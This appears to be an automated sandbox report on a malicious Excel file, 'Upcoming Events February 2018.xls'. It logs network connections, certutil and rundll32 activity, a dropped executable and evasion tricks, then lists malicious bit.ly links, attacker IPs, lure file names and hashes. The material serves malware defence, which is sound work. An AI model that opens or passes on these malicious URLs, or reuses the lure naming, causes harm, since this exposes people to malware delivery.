Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE	Process information set: FAILCRITICALERRORS and NOOPENFILEERRORBOX

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Show sources

Source: C:\Windows\System32\rundll32.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Network Connect: 45.33.77.71 187
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Network Connect: 170.207.225.82 80
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Network Connect: 67.199.248.11 80

Language, Device and Operating System Detection:

Contains functionality to query local / system time

Show sources

Source: C:\ProgramData\M4P9S1S3.exe

Code function: 4_2_00242FDE GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,RtlQueryPerformanceCounter,

4_2_00242FDE

Contains functionality to query windows version

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_10004383 GetVersionExA,GetSystemInfo,GetSystemMetrics,GetSystemMetrics,

5_2_10004383

Contains functionality to query CPU information (cpuid)

Show sources

Source: C:\ProgramData\M4P9S1S3.exe

Code function: 4_2_0024339B cpuid

4_2_0024339B

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\rundll32.exe

Queries volume information: C:\ VolumeInformation

Behavior Graph

Simulations

Behavior and APIs

Time	Type	Description
09:56:48	API Interceptor	1x Sleep call for process: EXCEL.EXE modified from: 30000ms to: 100ms
09:56:48	API Interceptor	1x Sleep call for process: EXCEL.EXE modified from: 300000ms to: 100ms
09:56:49	API Interceptor	533x Sleep call for process: EXCEL.EXE modified from: 60000ms to: 100ms
09:56:52	API Interceptor	1x Sleep call for process: certutil.exe modified from: 60000ms to: 100ms
09:56:55	API Interceptor	1x Sleep call for process: rundll32.exe modified from: 30000ms to: 100ms
09:56:55	API Interceptor	1150x Sleep call for process: rundll32.exe modified from: 60000ms to: 100ms
09:57:15	API Interceptor	1x Sleep call for process: OUTLOOK.EXE modified from: 300000ms to: 100ms
09:57:15	API Interceptor	1x Sleep call for process: OUTLOOK.EXE modified from: 30000ms to: 100ms
09:57:25	API Interceptor	1x Sleep call for process: OUTLOOK.EXE modified from: 60000ms to: 100ms
09:57:34	API Interceptor	7x Sleep call for process: rundll32.exe modified from: 1800000ms to: 100ms
09:57:34	API Interceptor	6x Sleep call for process: rundll32.exe modified from: 10000ms to: 100ms

Antivirus Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Upcoming Events February 2018.xls	61%	virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Link
ipv4.google.com	0%	virustotal	Browse
www.janes.com	0%	virustotal	Browse
google.com	0%	virustotal	Browse
clients1.google.com	0%	virustotal	Browse

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
67.199.248.11	RFQ.pdf	3cfc4a47958f4a9c8231f479048831c8889d406e55a4d26b801e8918f188fc54	malicious	Browse	bit.ly/2upCaCO
	Approval.pdf	3c26e22685ef05b549c3b7f200682e4f2352f8d94635c6a1436ca5545d4cc948	malicious	Browse	bit.ly/2jwf8Zy
	http://bit.ly/2DkIAH3		malicious	Browse	bit.ly/2DkIAH3
	http://bit.ly/2hunsoL		malicious	Browse	bit.ly/2hunsoL
	http://bit.ly/2Ft4uJi		malicious	Browse	bit.ly/2Ft4uJi
	APPROVE-DOC.pdf	df22d78e68756f176a075616913e8660ce623b0dcce4425365eb703490335100	malicious	Browse	bit.ly/2xBnulq
	Invoice-000456.pdf	21af534c09928e90eeb847ba594bb0861d71df434c15aabd49992c803c14a5a9	malicious	Browse	bit.ly/2iHzw9L
	CDoc414.pdf	8238259b2b053b39662058d9c23c3b38afd9d089889fed1bdf3e5400e570cabb	malicious	Browse	bit.ly/2zvCVeO
	flashUpdate.exe	e863545b815fe556e0d39fb0a8fc6eae7d116d0f169d6f3335b8f23b74adfc10	malicious	Browse	bit.ly/2DXEcPm
	http://bit.ly/2z23bAM		malicious	Browse	bit.ly/2z23bAM
	LPA_Teaser_$160MWaterFord_LP_Invitation.pdf	111ab88bd1b092401aa049fdd3d20478efdddbdb72e22dbce0f9e3254cb5d8e2	malicious	Browse	bit.ly/2EJWSBI
	j5b1xBDZoT.exe	b472203a21023e45a70684c51d088bee27e29772cba4521915e1e7e5e302514d	malicious	Browse	bit.ly/redir3352

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
bit.ly	RFQ.pdf	3cfc4a47958f4a9c8231f479048831c8889d406e55a4d26b801e8918f188fc54	malicious	Browse	67.199.248.10
	Cash Statement.pdf	8055b485521aa9d06f8521e095fc6dda1a8ffd3a9aad21ec0f5fd498205fe57a	malicious	Browse	67.199.248.10
	Approval.pdf	3c26e22685ef05b549c3b7f200682e4f2352f8d94635c6a1436ca5545d4cc948	malicious	Browse	67.199.248.11
	https://bitly.com/2ADBPis		malicious	Browse	67.199.248.10
	2018-01-10_12-13-23.exe	cb79748ee67032d541a333e053cdf8dd2a3f53bc47855d35381814d75e155050	malicious	Browse	67.199.248.10
	http://bit.ly/2DkIAH3		malicious	Browse	67.199.248.11
	Scan_0613.pdf	3a692c2a5dee3b4f44caefcb06ac70a5fe4db4dc894811eec4f2a30bc3330d01	malicious	Browse	67.199.248.10
	Swisscom-E-Mail-Adressen.doc	93a31f8dd3b6b354d8517891987ab0fdafa42baecf53d0cf144a0eba9ea707e5	malicious	Browse	69.58.188.40
	http://bit.ly/2hunsoL		malicious	Browse	67.199.248.11
	http://bit.ly/2Ft4uJi		malicious	Browse	67.199.248.11
	APPROVE-DOC.pdf	df22d78e68756f176a075616913e8660ce623b0dcce4425365eb703490335100	malicious	Browse	67.199.248.11
	http://bit.ly/2yImbDr		malicious	Browse	67.199.248.11
	Invoice-000456.pdf	21af534c09928e90eeb847ba594bb0861d71df434c15aabd49992c803c14a5a9	malicious	Browse	67.199.248.11
	CDoc414.pdf	8238259b2b053b39662058d9c23c3b38afd9d089889fed1bdf3e5400e570cabb	malicious	Browse	67.199.248.11
	DOC-9R949SAD2NUS991AA1234N57E9SD777843U54534.cmd	10a56591afa408ebf566e265f2bf0f3555e3e7288a103ef5f22ecea7c26b99f7	malicious	Browse	67.199.248.11

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LINODE-APLinodeLLCUS	Emotet.doc	9e7a51d4c86a41a01d0e6bcac1c7720ebae68bb08b7840cad7f35003a0105527	malicious	Browse	173.230.145.224
	Emotet119.doc	81425c15025f0fe9f4314c0130b00fd974f4522eb622f030f613e7940111f8bf	malicious	Browse	173.230.145.224
	http://nikohsec.com/fax.php?afx153=samantha.myers@sonoco.com		malicious	Browse	176.58.107.178
	emotet.doc	6af5bfdcf4eb49bc637ccccaeea9c830f9e4812011e5efb1a5512eca5bdc7d57	malicious	Browse	64.62.228.170
	36messag.exe	8ae8ce82f26a356fbc9f3914df13f53b06f133c1e4018ff4592fda47e6ae392e	malicious	Browse	69.164.195.140
	http://cinetiux.com/LLC/?newinvoice01.doc		malicious	Browse	173.230.145.224
	http://newsletter.promostelefoniica.com/t/j-l-ohddhhl-yhdkkudtit-r/		malicious	Browse	45.79.77.20
	Invoices attached.doc	b01b4536b42112800c59916770b78df94bd5e860c2de228215e7d54f18e35be5	malicious	Browse	173.255.217.114
	EEYJ1-20229930926.doc	65ae5c0e9abc9f14e05db6ea1fd31c1b3a9a62e6b2e68f2355c00a02ef49ed2f	malicious	Browse	173.255.217.114
	http://www.mayflowerex.com/Sales-Invoice/		malicious	Browse	176.58.104.69
	faktura 5775747_PDF.js	95b7fe99c86fd526a250159eeda5f408cfb80fa7501efede4289628c64438142	malicious	Browse	176.58.123.25
	Invoice Number 64069.doc	4cabdde381330a3d91951513382f05825e9b1329f3133d0d4028279f2a5ff849	malicious	Browse	173.255.217.114
	57BL copy.exe	78d3d28498c3ae5b8e8818e42c67d15fbc321786f9438ea7932a81383951c2eb	malicious	Browse	45.56.68.98
	https://virtualadministrator.com/blog/		malicious	Browse	173.255.229.55
	uSUbynSM4.exe	2baf2a6cecf98c452c9a80e125a21273e688573f52db6389137f81e91a67e8a7	malicious	Browse	173.230.145.224
	13BMXTFVU.exeJQXLG.exe	8c41cf0b7a10fffa0f4086a16044dc23ba1011d8b2a9995ec7011c0e3f18eee7	malicious	Browse	72.14.182.233
	Outstanding Invoices.doc	4d31f25c4da2b05fbacc21035e0a2284be60e10ef103d3a1d412234717706550	malicious	Browse	173.230.145.224
	yxcLHdJwJq.exe	9e5f163d61582ac9e16cf9ae96c76bc420cea76c34aba50f54bb6a558dc7fdea	malicious	Browse	45.79.194.109
	49Order List.exe	aef4d513540180a040da1a8e6c43a67eac3d627236feec8ebe3aafade6d0c6c0	malicious	Browse	72.14.182.233
	Scan1782384.doc	6cf585b16de1edb9dc313886ddb4b32d617290eef1c9ce1a2ef6160336c1eaad	malicious	Browse	173.230.145.224
BITLY-AS-BitlyIncUS	Approval.pdf	3c26e22685ef05b549c3b7f200682e4f2352f8d94635c6a1436ca5545d4cc948	malicious	Browse	67.199.248.11
	https://bitly.com/2ADBPis		malicious	Browse	67.199.248.10
	2018-01-10_12-13-23.exe	cb79748ee67032d541a333e053cdf8dd2a3f53bc47855d35381814d75e155050	malicious	Browse	67.199.248.10
	http://bit.ly/2DkIAH3		malicious	Browse	67.199.248.11
	http://bit.ly/2hunsoL		malicious	Browse	67.199.248.11
	ddownload39.club		malicious	Browse	67.199.248.13
	http://bit.ly/2Ft4uJi		malicious	Browse	67.199.248.11
	https://buff.ly/2CQlDec		malicious	Browse	67.199.248.13
	APPROVE-DOC.pdf	df22d78e68756f176a075616913e8660ce623b0dcce4425365eb703490335100	malicious	Browse	67.199.248.11
	http://bit.ly/2yImbDr		malicious	Browse	67.199.248.11
	Invoice-000456.pdf	21af534c09928e90eeb847ba594bb0861d71df434c15aabd49992c803c14a5a9	malicious	Browse	67.199.248.11
	CDoc414.pdf	8238259b2b053b39662058d9c23c3b38afd9d089889fed1bdf3e5400e570cabb	malicious	Browse	67.199.248.11
	DOC-9R949SAD2NUS991AA1234N57E9SD777843U54534.cmd	10a56591afa408ebf566e265f2bf0f3555e3e7288a103ef5f22ecea7c26b99f7	malicious	Browse	67.199.248.11
	https://bitly.com/2ATuKu6		malicious	Browse	67.199.248.11
	SCANNER09-009873.pdf	4acd74b5eed8fb291e3a1e375edd0ccb58965bafeef0a29f0338a8ea11cc7dfc	malicious	Browse	67.199.248.10
	flashUpdate.exe	e863545b815fe556e0d39fb0a8fc6eae7d116d0f169d6f3335b8f23b74adfc10	malicious	Browse	67.199.248.11
	k7nRrhqfBd.exe	39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800	malicious	Browse	67.199.248.10
	setup_sex_game.exe	9c685e70f53b6b23a9cf45fcd10e46fa8fe2c68dfd62a8d2901100ba6cb9efcf	malicious	Browse	67.199.248.10
	http://bit.ly/2y6BB0B		malicious	Browse	67.199.248.10
	Cornerstone-Technologies Renewal.pdf	e1d94024d380380a1b7e1f4f8f6213de79f5e1f68f346364ffd00d4f0a4cb823	malicious	Browse	67.199.248.10

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Local\cdnver.dll	foo.exe	ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8	malicious	Browse

Screenshot

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

AV Detection:

Cryptography:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Software Vulnerabilities:

Networking:

Boot Survival:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

Dropped Files

Screenshot